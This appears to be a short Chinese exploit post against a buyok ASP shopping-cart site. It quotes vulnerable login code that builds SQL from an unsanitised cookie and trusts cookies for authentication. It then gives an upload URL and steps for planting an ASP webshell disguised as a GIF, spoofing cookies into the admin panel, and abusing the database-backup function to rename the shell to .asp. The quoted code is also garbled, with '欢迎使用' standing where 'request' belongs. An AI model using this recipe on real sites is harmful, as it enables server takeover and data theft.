漏洞代码开始处
sub checklogin()
set rscheck=conn.execute("select * from buser where UserId='"&欢迎使用.cookies("buyok")("userid")&"'")
if rscheck.eof and rscheck.bof then
response.write "<script language='javascript'>"
response.write "alert('对不起,您还没有注册或登陆。');"
response.write "location.href='javascript:history.go(-1)';"
response.write "</script>"
response.end
end if
set rscheck=nothing
end sub
function checkuserkou()
if 欢迎使用.cookies("buyok")("userid")="" then
checkuserkou=10
else
checkuserkou=欢迎使用.cookies("buyok")("userkou")
if 欢迎使用.cookies("buyok")("userkou")="" then checkuserkou=10
end if
end function
sub aspsql()
end sub
sub buyok_check_path()
end Sub
'漏洞代码结束
利用方法
admin/upload.asp?fuptype=db&fupname=shopbackup&frmname=db.asp
上传GIF后缀的ASP木马,然后COOKIE欺骗后台备份数据库抓包,再然后修改数据包备份上面传上去的马。Over
